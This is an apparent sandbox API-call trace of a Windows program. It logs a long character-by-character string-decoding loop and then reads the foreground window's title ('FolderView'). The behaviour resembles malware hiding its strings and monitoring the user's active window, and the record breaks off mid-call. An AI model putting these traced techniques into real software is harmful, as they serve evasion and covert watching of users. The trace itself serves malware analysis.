0x0 [0180.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.468] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.469] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0180.469] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.469] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0180.470] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.470] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0180.471] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.471] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="k", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="k") returned 1 [0180.472] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.472] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.472] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.473] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0180.473] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.474] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0180.474] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.475] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0180.475] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.475] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0180.476] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.476] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0180.524] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.524] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0180.525] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.525] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.525] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0180.525] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.527] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0180.527] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.527] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0180.528] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.528] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0180.529] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.529] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.530] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.530] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0180.531] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.531] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0180.532] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.532] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0180.533] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.533] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0180.534] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.534] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.534] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.535] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.535] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.536] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0180.536] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.537] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.537] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.538] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.538] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.540] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0180.540] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.541] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.541] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.542] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.542] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.542] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.543] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.543] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.544] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.544] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.545] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.545] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.546] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.546] GetForegroundWindow () returned 0x1011a [0180.546] GetLastError () returned 0x0 [0180.546] SysStringLen (param_1=" ") returned 0xff [0180.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0180.546] SysStringLen (param_1=" ") returned 0xff [0180.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0180.547] GetWindowTextA (in: hWnd=0x1011a, lpString=0x11644c4, nMaxCount=255 | out: lpString="FolderView") returned 10 [0180.547] GetLastError () returned 0x0 [0180.547] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0180.547] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="FolderView") returned 256 [0180.547] SysStringLen (param_1="FolderView") returned 0xb [0180.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FolderView", cchWideChar=12, lpMultiByteStr=0x1150ca4, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FolderView", lpUsedDefaultChar=0x0) returned 12 [0180.548] SetWindowTextA (hWnd=0x103c4, lpString="FolderView") returned 1 [0180.548] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0180.548] GetFocus () returned 0x0 [0180.548] lstrlenA (lpString="FolderView") returned 10 [0180.548] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x1150ca4) returned 0x1 [0180.549] IsWindow (hWnd=0x103c4) returned 1 [0180.549] IsWindow (hWnd=0x103c4) returned 1 [0180.549] IsWindow (hWnd=0x103c4) returned 1 [0180.549] IsWindow (hWnd=0x103c4) returned 1 [0180.550] GetFocus () returned 0x0 [0180.550] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xa [0180.550] GetFocus () returned 0x0 [0180.550] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xb) returned 0x10e1d20 [0180.550] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, 